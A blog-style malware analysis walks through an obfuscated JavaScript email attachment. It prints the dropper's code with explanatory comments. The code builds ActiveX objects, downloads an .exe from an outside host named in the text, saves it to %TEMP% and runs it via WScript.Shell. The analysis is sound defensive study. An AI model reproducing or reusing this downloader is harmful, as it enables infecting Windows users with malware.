I received a mail to my company account from my mail
itself. And I was pretty sure that I haven’t sent a mail to myself. So I
checked the Header of the email, it was shown that it’s from a unknown source.
Now I was pretty convinced that this is a rogue email
that may contain some kind of malicious code. The mail had an attachment containing a file called “Image917524490855.zip”.
I was curious to know what was inside and how it could
infect my computer. After extracting the
zip file, I found it was containing a JS file. So now I wanted to know, how a JavaScript
file could contain infect my system with virus.
Boy, I gotta to tell if you want to learn cool, innovative
model of coding and learn new things, you go through the codebase of a virus.
I'm breaking down the code to small snippets to understand what going on it and have commented inside the code its meaning and current variable value and unfamilar command's syntax.
To see the full codebase, please check the github page here
To see the full codebase, please check the github page here
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| thickI = 0; String.prototype.millinery = function () { aa = this ; return aa.charAt(8 * 0 * 8); // returns the Strings characterAT(0); that is first character }; var BilRTKUok = [ "p" + ( "italy" , "navel" , "squatter" , "ST" ) + "FV" + ( "lassie" , "monopolize" , "neighborhood" , "YI" ) + "rjX" , "o" + "Gyfv" + "yW" + "IH" + ( "crossroads" , "hybrid" , "stingy" , "interlude" , "hQ" ), "E" + ( "keyboard" , "tandem" , "gotten" , "listen" , "xp" ) + "an" + ( "keith" , "vestige" , "input" , "heinous" , "dE" ) + "nv" + "ir" + ( "septuagint" , "bookkeeper" , "greece" , "scimitar" , "on" ) + "me" + ( "patio" , "unleavened" , "nt" ) + ( "garnered" , "adrift" , "St" ) + ( "performance" , "yahoo" , "ri" ) + ( "voices" , "mexico" , "ngs" ), "" + "%" + ( "burdett" , "tongs" , "TE" ) + ( "travail" , "inserted" , "MP%" ), "" + "." + ( "followed" , "casting" , "second" , "exe" ), ( "including" , "enemy" , "R" ) + "un" , ( "chronology" , "alexandra" , "nightmare" , "helicopter" , "A" ) + "ct" + "co" + "ndoi" + "vc" + ( "ranks" , "homogeneous" , "sudan" , "decorate" , "ondo" ) + "eX" + ( "sediment" , "forces" , "preparation" , "graphs" , "cond" ) + "oO" + "bc" + ( "revealed" , "isolate" , "malta" , "macintosh" , "on" ) + "do" + ( "enhance" , "install" , "jecond" ) + "oct" , "nlHcwmmYdvD" , "HCpQSg" , "W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ( "commissioner" , "papua" , "spalding" , "tasting" , "on" ) + "do." + ( "manslaughter" , "fiftyfive" , "workstation" , "halter" , "S" ), "LVEhhuKWtV" , ( "convergence" , "lamentation" , "abstracts" , "lynching" , "hco" ) + "ndoe" + "lc" + "on" + ( "playback" , "quench" , "doing" , "ballet" , "dol" ), "BHyXGt" , "V" + ( "informer" , "parrot" , "redeem" , "me" ) + "VY" + ( "colin" , "reprint" , "tropical" , "VS" ), ( "durable" , "mention" , "provisional" , "shuttle" , "McondoSXc" ) + ( "naming" , "facility" , "on" ) + ( "scamp" , "privy" , "doMLcond" ) + "o2" + ( "ordinance" , "distributed" , "mediator" , "delinquent" , "." ) + "co" + ( "wellbred" , "misshapen" , "nd" ) + "oXMc" + "on" + ( "unsaid" , "leather" , "jenny" , "animus" , "doLH" ) + ( "pyramids" , "contribution" , "co" ) + ( "extend" , "suppliers" , "treasury" , "furniture" , "nd" ) + "oTTP" ]; // see img BilRTKUok-01.JPG |
thickI = 0;
String.prototype.millinery = function() {
aa = this;
return aa.charAt(8 * 0 * 8); // returns the Strings characterAT(0); that is first character
};
var BilRTKUok = [
"p" + ("italy", "navel", "squatter", "ST") + "FV" + ("lassie", "monopolize", "neighborhood", "YI") + "rjX",
"o" + "Gyfv" + "yW" + "IH" + ("crossroads", "hybrid", "stingy", "interlude", "hQ"),
"E" + ("keyboard", "tandem", "gotten", "listen", "xp") + "an" + ("keith", "vestige", "input", "heinous", "dE") + "nv" + "ir" + ("septuagint", "bookkeeper", "greece", "scimitar", "on") + "me" + ("patio", "unleavened", "nt") + ("garnered", "adrift", "St") + ("performance", "yahoo", "ri") + ("voices", "mexico", "ngs"),
"" + "%" + ("burdett", "tongs", "TE") + ("travail", "inserted", "MP%"),
"" + "." + ("followed", "casting", "second", "exe"),
("including", "enemy", "R") + "un",
("chronology", "alexandra", "nightmare", "helicopter", "A") + "ct" + "co" + "ndoi" + "vc" + ("ranks", "homogeneous", "sudan", "decorate", "ondo") + "eX" + ("sediment", "forces", "preparation", "graphs", "cond") + "oO" + "bc" + ("revealed", "isolate", "malta", "macintosh", "on") + "do" + ("enhance", "install", "jecond") + "oct",
"nlHcwmmYdvD",
"HCpQSg",
"W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ("commissioner", "papua", "spalding", "tasting", "on") + "do." + ("manslaughter", "fiftyfive", "workstation", "halter", "S"),
"LVEhhuKWtV",
("convergence", "lamentation", "abstracts", "lynching", "hco") + "ndoe" + "lc" + "on" + ("playback", "quench", "doing", "ballet", "dol"),
"BHyXGt",
"V" + ("informer", "parrot", "redeem", "me") + "VY" + ("colin", "reprint", "tropical", "VS"),
("durable", "mention", "provisional", "shuttle", "McondoSXc") + ("naming", "facility", "on") + ("scamp", "privy", "doMLcond") + "o2" + ("ordinance", "distributed", "mediator", "delinquent", ".") + "co" + ("wellbred", "misshapen", "nd") + "oXMc" + "on" + ("unsaid", "leather", "jenny", "animus", "doLH") + ("pyramids", "contribution", "co") + ("extend", "suppliers", "treasury", "furniture", "nd") + "oTTP"
]; // see img BilRTKUok-01.JPG
line 06: EvenThough there is lot of words and unintelligent words in BilRTKUok Array, after the execution of the array, it becomes like the below Fig: BilRTKUok-01.JPG.
Fig: BilRTKUok-01.JPG
BilRTKUok.splice(7, thickI + 2); // After splice removes 2 items; see img BilRTKUok-02.JPG | |
BilRTKUok.splice(7, thickI + 2); // After splice removes 2 items; see img BilRTKUok-02.JPG
After the splicing of the BilRTKUok array, it becomes as shown in below Fig: BilRTKUok-02.JPG
Fig: BilRTKUok-02.JPG
35
36
37
38
39
40
41
42
43
44
45
| amino = BilRTKUok[1 + 4 + 1].split( "condo" ).join( "" ); // = "ActiveXObject" //var WUHOHMfe = this["ActiveXObject"]; var WUHOHMfe = this [amino]; statement = (( "savings" , "perfidy" , "qHgSeaxuhoE" , "hormone" , "pSCfJszNMe" ) + "xJwXsnxn" ).millinery(); // statement = "p" announcements = (( "linking" , "scholastic" , "JgndJbrQuz" , "timely" , "shWLaSRGCWke" ) + "MRkwwfHjVT" ).millinery(); // announcements = "s" thickI = 7; BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2]; // BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol" BilRTKUok[thickI + 1] = "kAgWlwsNfXY" ; // BilRTKUok[8] = "kAgWlwsNfXY" BilRTKUok.splice(thickI + 1, thickI - 4); // After splice removes 2 items; see img BilRTKUok-03.JPG |
amino = BilRTKUok[1 + 4 + 1].split("condo").join(""); // = "ActiveXObject"
//var WUHOHMfe = this["ActiveXObject"];
var WUHOHMfe = this[amino];
statement = (("savings", "perfidy", "qHgSeaxuhoE", "hormone", "pSCfJszNMe") + "xJwXsnxn").millinery(); // statement = "p"
announcements = (("linking", "scholastic", "JgndJbrQuz", "timely", "shWLaSRGCWke") + "MRkwwfHjVT").millinery(); // announcements = "s"
thickI = 7;
BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2]; // BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol"
BilRTKUok[thickI + 1] = "kAgWlwsNfXY"; // BilRTKUok[8] = "kAgWlwsNfXY"
BilRTKUok.splice(thickI + 1, thickI - 4); // After splice removes 2 items; see img BilRTKUok-03.JPG
line 36 : The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems.
Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, ...) provide OLE Automation objects to allow communication with them. You can use the methods and properties supported by Automation objects in JavaScript.
Luckily, the ActiveXObject object is only supported by Internet Explorer. To know more on ActiveXObject, check this site
line 57 : After this code, the Array becomes as shown in the Fig:ilRTKUok-03.JPG below
Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, ...) provide OLE Automation objects to allow communication with them. You can use the methods and properties supported by Automation objects in JavaScript.
Luckily, the ActiveXObject object is only supported by Internet Explorer. To know more on ActiveXObject, check this site
line 57 : After this code, the Array becomes as shown in the Fig:ilRTKUok-03.JPG below
Fig: BilRTKUok-03.JPG
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
| BilRTKUok[thickI] = BilRTKUok[thickI].split( "condo" ).join( "" ); // "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell" //var yzavYsf = new ActiveXObject("WScript.shell"); var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]); thickI++; // thickI = 8 BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split( "condo" ).join( "" ); // "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP" //var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP"); var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]); thickI /= 2; // thickI = 4 //var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%") var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]); corporatee = (( "mechanics" , "seraphic" , "TyEzvHbHt" , "disorders" , "ElpAWvfz" ) + "TpDEqAkzD" ).millinery(); // corporatee = "E" |
BilRTKUok[thickI] = BilRTKUok[thickI].split("condo").join(""); // "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell"
//var yzavYsf = new ActiveXObject("WScript.shell");
var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]);
thickI++; // thickI = 8
BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split("condo").join(""); // "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP"
//var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP");
var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]);
thickI /= 2; // thickI = 4
//var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%")
var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]);
corporatee = (( "mechanics", "seraphic", "TyEzvHbHt", "disorders", "ElpAWvfz") + "TpDEqAkzD").millinery(); // corporatee = "E"
line 48 : What is WSH? WSH is a script host. A script host is a program that provides an environment in which users can execute scripts in a variety of languages, languages that use a variety of object models to perform tasks. To Read more, check this site
The WshShell object gives your scripts the ability to work with the Windows shell. Your scripts can use the WshShell object to perform a number of system administration tasks, including running programs, reading from and writing to the registry, and creating shortcuts.
line 53 : The MSXML2.XMLHTTP is the XML HTTP Request Object used to call Server APIs Asynchronously.
113
| screensaver( "h" + "tt" + ( "photographic" , "baleful" , "formality" , "p:" ) + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ( "edification" , "goodfellowship" , "om" ) + "/7" + "62" + "tr" + "g22e" + "2." + "exe" , "FfXlke" ); |
screensaver("h" + "tt" + ("photographic", "baleful", "formality", "p:") + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ("edification", "goodfellowship", "om") + "/7" + "62" + "tr" + "g22e" + "2." + "exe", "FfXlke");
line 113 : Don't let the function name decieve you, its no screensaver function. In summary this custom function will call the server api and download the contents of virus codebase to a file and tells the system to run that file.
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
| function screensaver(aristocrat, welter) { // aristocrat = "http ://dev.fanjapan.com/762trg22e2 .exe" // Virus! dont click unless you are Batman who confronts his worst Fear (here Virus) // welter = "FfXlke" try { var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI]; // = "%TEMP%/FfXlke.exe" var open = "o" + statement + corporatee + "n" ; // = "opEn" var meth= ( "improvement" , "tardily" , "G" ) + corporatee + ( "rocco" , "grapple" , "tillage" , "T" ); // = "GET" // MSXML2.XMLHTTP.open("GET","http ://dev.fanjapan.com/762trg22e2 .exe", false); QcarAWR[open](meth, aristocrat, false ); var func2= announcements + ( "tuition" , "glinting" , "unfounded" , "arctic" , "e" ) + (( "unholy" , "curbed" , "LLpUmwQBnsk" , "spurn" , "kissing" , "nGDOpiDLl" ) + "FKfAxgifRdX" ).millinery() + (( "computer" , "snail" , "races" , "leicestershire" , "archive" , "dEAqcmjkU" ) + "KpOALvGVT" ).millinery(); // = send QcarAWR[func2](); // MSXML2.XMLHTTP.send(); if (QcarAWR.status == 200) { var func3 = (( "calibre" , "hilton" , "collectibles" , "skating" , "" ) + "A" + ( "realistic" , "invitations" , "vulcan" , "pO" ) + "DB." + "" + "S" + ( "dwindle" , "homework" , "centered" , "tr" ) + ( "athletics" , "dresses" , "eam" )).replace( "p" , "D" ); // = "ADODB.Stream" // var hytSjp = new ActiveXObject("ADODB.Stream"); var hytSjp = new WUHOHMfe(func3); var func4 = "" + "o" + ( "fraternity" , "manner" , "simplified" , "consent" , "pen" ); // = "open" //ADODB.Stream.open(); hytSjp[func4](); hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1 var func5 = "w" + ( "targets" , "limply" , "shell" , "ri" ) + "te" ; // = write var func6 = "" + ( "numeral" , "drawl" , "tasteful" , "R" ) + "es" + ( "defender" , "typewriter" , "accumulates" , "necessitate" , "pon" ) + announcements + ( "carolina" , "ravage" , "malediction" , "e" ) + "Bo" + "dy" ; // = "ResponseBody" //ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody); hytSjp[func5](QcarAWR[func6]); var func7 = (statement + "o" + "Di" + ( "bracelet" , "beast" , "cheaper" , "ti" ) + "on" ).replace( "D" , announcements); // = position hytSjp[func7] = 0; // ADODB.Stream.position = 0 var func8= "s" + "av" + "eT" + ( "scrimmage" , "alliance" , "oFile" ); // = saveToFile // ADODB.Stream.saveToFile(FileName, adSaveCreateOverWrite); hytSjp[func8](transmit, 2); hytSjp.close(); // ADODB.Stream.close(); //WScript.Shell.Run(strCommand, [intWindowStyle], [bWaitOnReturn]) yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo" ); // "TPYHPf" === "LDNSGABujeo" means false } } catch (cNINLnxTF) { console.log(cNINLnxTF); }; } |
function screensaver(aristocrat, welter) {
// aristocrat = "http ://dev.fanjapan.com/762trg22e2 .exe" // Virus! dont click unless you are Batman who confronts his worst Fear (here Virus)
// welter = "FfXlke"
try {
var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI]; // = "%TEMP%/FfXlke.exe"
var open ="o" + statement + corporatee + "n"; // = "opEn"
var meth= ("improvement", "tardily", "G") + corporatee + ("rocco", "grapple", "tillage", "T"); // = "GET"
// MSXML2.XMLHTTP.open("GET","http ://dev.fanjapan.com/762trg22e2 .exe", false);
QcarAWR[open](meth, aristocrat, false);
var func2= announcements + ("tuition", "glinting", "unfounded", "arctic", "e") + (("unholy", "curbed", "LLpUmwQBnsk", "spurn", "kissing", "nGDOpiDLl") + "FKfAxgifRdX").millinery() + (("computer", "snail", "races", "leicestershire", "archive", "dEAqcmjkU") + "KpOALvGVT").millinery(); // = send
QcarAWR[func2](); // MSXML2.XMLHTTP.send();
if (QcarAWR.status == 200) {
var func3 = (("calibre", "hilton", "collectibles", "skating", "") + "A" + ("realistic", "invitations", "vulcan", "pO") + "DB." + "" + "S" + ("dwindle", "homework", "centered", "tr") + ("athletics", "dresses", "eam")).replace("p", "D"); // = "ADODB.Stream"
// var hytSjp = new ActiveXObject("ADODB.Stream");
var hytSjp = new WUHOHMfe(func3);
var func4 = "" + "o" + ("fraternity", "manner", "simplified", "consent", "pen"); // = "open"
//ADODB.Stream.open();
hytSjp[func4]();
hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1
var func5 = "w" + ("targets", "limply", "shell", "ri") + "te" ; // = write
var func6 = "" + ("numeral", "drawl", "tasteful", "R") + "es" + ("defender", "typewriter", "accumulates", "necessitate", "pon") + announcements + ("carolina", "ravage", "malediction", "e") + "Bo" + "dy"; // = "ResponseBody"
//ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody);
hytSjp[func5](QcarAWR[func6]);
var func7 = (statement + "o" + "Di" + ("bracelet", "beast", "cheaper", "ti") + "on").replace("D", announcements); // = position
hytSjp[func7] = 0; // ADODB.Stream.position = 0
var func8="s" + "av" + "eT" + ("scrimmage", "alliance", "oFile"); // = saveToFile
// ADODB.Stream.saveToFile(FileName, adSaveCreateOverWrite);
hytSjp[func8](transmit, 2);
hytSjp.close(); // ADODB.Stream.close();
//WScript.Shell.Run(strCommand, [intWindowStyle], [bWaitOnReturn])
yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo"); // "TPYHPf" === "LDNSGABujeo" means false
}
}
catch (cNINLnxTF) {
console.log(cNINLnxTF);
};
}
line 71 : sends Server API request to receive the Virus File
line 80 : the ADO Stream Object is used to read, write, and manage a stream of binary data or text. To know more, read here.
ADODB.Stream object is created to handle the binary data contents of the virus file.
line 80 : the contents of the virus file received via the XMLHttp Response object is written to the ADODB Stream.
line 99 : the ADODB Stream is saved to the file created in %TEMP% folder.
line 104 : the WshShell object is used to run the (Virus) file created in the %TEMP% folder.
To see the full codebase, please check the github page here